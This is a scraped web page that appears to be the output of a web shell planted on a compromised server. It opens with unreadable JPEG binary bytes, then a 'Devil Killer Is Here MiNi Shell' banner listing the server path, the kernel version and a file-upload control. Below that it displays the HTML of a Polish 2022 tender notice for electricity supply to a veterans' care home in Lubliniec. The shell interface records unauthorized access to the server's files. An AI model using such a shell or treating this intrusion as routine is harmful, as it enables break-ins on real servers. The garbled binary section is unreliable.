JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221114/0043716601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> ZAKUP ENERGII ELEKTRYCZNEJ NA POTRZEBY DOMU POMOCY SPOŁECZNEJ „DOM KOMBATANTA” W LUBLIŃCU </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dom Pomocy Społecznej Dom Kombatanta im. św. Rafała Kalinowskiego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001270196</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">dr Emila Cyrana 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lubliniec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">343564193</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">343564193</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">administracja@dpskombatant.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dpskombatant.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - związki podmiotów, o których mowa w art. 4 pkt 1 lub 2 ustawy lub podmiotów, o których mowa w art. 4 pkt. 3 ustawy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Opieka społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZAKUP ENERGII ELEKTRYCZNEJ NA POTRZEBY DOMU POMOCY SPOŁECZNEJ „DOM KOMBATANTA” W LUBLIŃCU </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9f4f4c2a-640d-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00437166</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00068516/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.7 Zakup energii elektrycznej (DAG.26.28.23)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.dpskombatant.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/dpskombatant</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcą, w tym wszelkie oświadczenia, <br/> wnioski zawiadomienia oraz informacje, przekazywane są w formie elektronicznej <br/> za pośrednictwem Platformy i formularza „Wyślij wiadomość”: <br/> https://platformazakupowa.pl/pn/dpskombatant na stronie danego postępowania. <br/> Za datę przekazania (wpływu) oświadczeń wniosków, zawiadomień oraz informacji <br/> przyjmuję się datę ich przesłania za pośrednictwem Platformy <br/> poprzez kliknięcie przycisku „wyślij” wiadomości”, po którym pojawi się komunikat, <br/> że wiadomość została wysłana do Zamawiającego. <br/>Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści specyfikacji <br/> za pośrednictwem udostępnionego kanału. Wyjaśnienia treści specyfikacji oraz jej <br/> ewentualne zmiany będą dokonywane zgodnie z art. 284 ustawy p.z.p. Treść <br/> pytań (bez ujawniania źródła zapytania) wraz z wyjaśnieniami, bądź informacje o <br/> dokonaniu zmiany specyfikacji, Zamawiający będzie zamieszczał na Platformie w <br/> sekcji „Komunikaty”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) <br/> 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku <br/> z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich <br/> danych informujemy, że: <br/>1)	administratorem Pana/Pani danych osobowych w w/w postępowaniu jest: Dom Pomocy Społecznej „Dom Kombatanta” w Lublińcu przy ul. Cyrana 10, <br/>2)	inspektorem ochrony danych osobowych jest – Pani Alicja Wojciuszkiewicz-Kopyto dane kontaktowe tel. 530-035-528 oraz e-mail – iod2@lubliniec.starostwo.gov.pl,<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit.a RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na<br/>zakup energii elektrycznej na potrzeby Domu Pomocy Społecznej „Dom Kombatanta” w Lublińcu przy ul. dr E. Cyrana 10, prowadzonym w trybie podstawowym, na podstawie Pana/Pani dobrowolnej i świadomej zgody.<br/>4)	Odbiorcą Pana/ Pani danych osobowych jest Dom Pomocy Społecznej „Dom Kombatanta&#34; w Lublińcu,<br/>5)	Pana/ Pani dane osobowe nie będą przekazywane do Państwa Trzeciego,<br/>6)	Pani/Pana dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy,<br/>7)	Posiada Pan/ Pani prawo dostępu do treści swoich danych oraz prawo ich sprostowania, usunięcia, ograniczenia przetwarzania, prawo do przenoszenia danych, prawo wniesienia sprzeciwu, prawo do cofnięcia zgody na ich przetwarzanie w dowolnym momencie bez wpływu na zgodność z prawem przetwarzania, którego dokonano na podstawie zgody wyrażonej przed jej cofnięciem.<br/>8)	Przysługuje Panu/ Pani prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pan/ Pani, iż przetwarzanie danych osobowych Pana/ Pani dotyczących, narusza przepisy ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016r.<br/>9)	Podanie przez Pana/ Panią danych osobowych jest dobrowolne, ale konieczne dla celów związanych z prowadzonym postepowaniem.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DAG.26.28.23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 248850 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest zakup energii elektrycznej na potrzeby obiektu <br/> Dom Pomocy Społecznej „Dom Kombatanta” z siedzibą w Lublińcu przy <br/> ul. dr Emila Cyrana 10 w rozumieniu ustawy z dnia 10 kwietnia 1997 r. – Prawo <br/> energetyczne (j.t. Dz. U. z 2022 r., poz. 1385). <br/><br/>2. Usługi dystrybucji są świadczone na podstawie odrębnej umowy zawartej z <br/> Operatorem Systemu Dystrybucji (TAURON DYSTRYBUCJA), <br/>3. Podstawowe informacje o zamówieniu: <br/>a. Ilość układów pomiarowych rozliczających zużytą energią elektryczną: 2, <br/>b. Punkt poboru zamawiającego: 42-700 Lubliniec, ul. dr Emila Cyrana 10, <br/> numer ewidencyjny punktów poboru: <br/> 1 - nr licznika 13415750, nr PPE: 5903 2242 8300 6543 20,<br/> 2 - nr licznika 13415795, nr PPE: 5903 2242 8300 6543 37,<br/>c. Całkowita moc umowna [kW]: 120, <br/>d. Grupa taryfowa wg OSD: G11, G13, <br/>e. Szacunkowe zużycie w okresie obowiązywania umowy [MWh]: 315, <br/>f. Informacja o dotychczasowych zmianach sprzedawcy: kolejna zmiana, <br/>g. Informacja o umowach obecnie obowiązujących Zamawiającego: Umowa zawarta <br/> na czas określony do 31.12.2022 r. z Wykonawcą: RESPECT ENERGY S.A.<br/>h. Sposób wypowiedzenia umów: Umowa nie wymaga wypowiedzenia, <br/>i. Informacja o udziałach Zamawiającego w akcjach promocyjnych lub <br/> lojalnościowych: <br/> Zamawiający nie podpisywał aneksów dotyczących programów lojalnościowych <br/> i promocyjnych,<br/>j. Informacja o udzieleniu Wykonawcy pełnomocnictwa: <br/> Pełnomocnictwo i jego zakres jest integralną częścią umowy i stanowi do niej <br/> załącznik,<br/>k. Informacja o płatnikach: Zamawiający jest płatnikiem należności za zużytą energię <br/> elektryczną, <br/>l. Ilość umów jakie zawrze Wykonawca z Zamawiającym w ramach tego <br/> postępowania: 1. <br/><br/>4. Szacunkowe zużycie energii elektrycznej w okresie obowiązywania umowy ma <br/> charakter orientacyjny, służy do porównania ofert i w żadnym wypadku nie stanowi <br/> ze strony Zamawiającego zobowiązania do zakupu energii w podanej ilości. <br/> Wykonawcy nie będzie przysługiwało roszczenie z tytułu nie pobrania przez <br/> Zamawiającego przewidywanej ilości energii. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09300000-2 - Energia elektryczna, cieplna, słoneczna i jądrowa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają <br/>następujące warunki udziału w postępowaniu dotyczące: <br/><br/>1. Zdolności do występowania w obrocie gospodarczym: <br/> Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie <br/> Wykonawca zobowiązany jest wykazać w sposób szczególny; <br/>2.Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/> o ile wynika to z odrębnych przepisów: <br/> Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie <br/> Wykonawca zobowiązany jest wykazać w sposób szczególny; <br/>3.Sytuacji ekonomicznej lub finansowej: <br/> Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie <br/> Wykonawca zobowiązany jest wykazać w sposób szczególny; <br/>4. spełniają warunki udziału w postępowaniu, dotyczące: <br/>4.1 kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, <br/> o ile wynika to z odrębnych przepisów: <br/> Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że <br/> zgodnie z art. 32 ustawy z dnia 10 kwietnia 1997 r. – Prawo energetyczne <br/> posiada aktualną koncesję na prowadzenie działalności gospodarczej w <br/> zakresie obrotu energią elektryczną wydaną przez Prezesa Urzędu <br/> Regulacji Energetyki. <br/>4.2 zdolności technicznej: <br/> Warunek udziału dotyczący zdolności technicznej zostanie uznany za <br/> spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat lub jeżeli <br/> okres wykonywania działalności jest krótszy – w tym okresie, należycie <br/> wykonuje lub wykonał dostawę lub dostawy energii elektrycznej o łącznej <br/> wartości co najmniej 100.000 PLN brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe wymagane od Wykonawcy, którego oferta została <br/> najwyżej oceniona obejmują: <br/>5.1. Wykazanie przez Wykonawcę, że w okresie ostatnich 3 lat przed upływem <br/> terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – <br/> w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i <br/> podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem <br/> dowodów określających czy te dostawy zostały wykonane należycie, przy czym <br/> dowodami, o których mowa, są referencje bądź inne dokumenty wystawione <br/> przez podmiot, na rzecz którego dostawy były wykonywane, a jeżeli z <br/> uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie <br/> uzyskać tych dokumentów – oświadczenie wykonawcy. Referencje bądź inne <br/> dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie <br/> wcześniej niż 3 miesiące przed upływem terminu składania ofert. <br/>5.2. oświadczenia wykonawcy o braku wydania wobec niego prawomocnego wyroku <br/> sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem <br/> podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo – <br/> w przypadku wydania takiego wyroku lub decyzji – dokumentów <br/> potwierdzających dokonanie płatności tych należności wraz z ewentualnymi <br/> odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat <br/> tych należności; <br/>5.3. oświadczenia wykonawcy o braku orzeczenia wobec niego tytułem środka <br/> zapobiegawczego zakazu ubiegania się o zamówienia publiczne; <br/>5.4. odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/> i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, <br/> sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne <br/> przepisy wymagają wpisu do rejestru lub ewidencji; <br/>5.5. oświadczenia wykonawcy o przynależności albo braku przynależności do tej <br/> samej grupy kapitałowej; w przypadku przynależności do tej samej grupy <br/> kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź <br/> informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do <br/> zakłócenia konkurencji w postępowaniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert <br/> oświadczenie o niepodleganiu wykluczeniu z postępowania - zgodnie z <br/> Załącznikiem nr 3 do SWZ oraz oświadczenie dotyczące przesłanek wykluczenia <br/> z udziału w postępowania - zgodnie z Załącznikiem nr 4 do SWZ oraz zgodnie z <br/> Załącznikiem nr 9 do SWZ oświadczenie, o nie podleganiu wykluczeniu na <br/> podstawie art. 7 ust.1 i 9 ustawy z dnia 13 kwietnia 2022 roku o szczególnych <br/> rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz <br/> służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 poz 835).<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców (dotyczy <br/> również wspólników spółki cywilnej) oświadczenie, o którym mowa w pkt 1 składa <br/> każdy z Wykonawców wspólnie ubiegających się o zamówienie.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakazuje się dokonywania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy niezgodnych z art. 455 ustawy prawo zamówień publicznych, chyba że zmiana będzie dotyczyła następujących zdarzeń:<br/>Zmiany przepisów ustawy Prawo energetyczne lub aktów wykonawczych w szczególności dotyczących standardów dostawy energii elektrycznej;<br/>3)	wystąpienia konieczności zmiany osób wyznaczonych przez strony do wzajemnych kontaktów <br/>w sprawach związanych z realizacją umowy a także konieczności zmiany osób przy pomocy których Wykonawca realizuje przedmiot umowy (np. śmierć, choroba, ustanie stosunku pracy lub inne zdarzenia losowe);<br/>4)	zmiana terminu realizacji przedmiotu umowy z przyczyn niezależnych od Wykonawcy <br/>a w szczególności z przyczyn określonych w § 7 niniejszej Umowy;<br/>zmiana ilości punktów poboru energii wskazanych w Załączniku nr 1 do umowy z zastrzeżeniem § 7 ust. 7 niniejszej umowy;<br/>6)	zmiana miejsca dostawy energii elektrycznej;<br/>7)	zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy; <br/>zmiana zakresu zamówienia, poprzez rezygnację z części realizacji, w przypadku sprzedaży budynku objętego przedmiotem zamówienia;<br/>9)	zmiana umowy może nastąpić na podstawie art.15 r ustawy z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych;<br/>10)	wystąpienia konieczności wprowadzenia zmian spowodowanych następującymi okolicznościami:<br/>a)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy;<br/>b)	zmiany danych teleadresowych stron umowy lub innych danych zawartych w rejestrach publicznych;<br/>c)	inne przyczyny zewnętrzne i niemożliwe do przewidzenia w momencie zawarcia umowy (okoliczność prawna, ekonomiczna lub techniczna), za które żadna ze stron nie ponosi odpowiedzialności, skutkujące brakiem możliwości należytego wykonania umowy lub niemożliwością prowadzenia dostaw energii elektrycznej.<br/>3. Ceny i stawki określone przez Wykonawcę nie będą zmieniane w toku realizacji zamówienia <br/>z wyjątkiem sytuacji, w której dokona się zmiana stawki podatku VAT lub podatku akcyzowego oraz w przypadku zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia.<br/>4. Zmiana umowy dokonana z naruszeniem ust. 2 i 3 podlega unieważnieniu. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 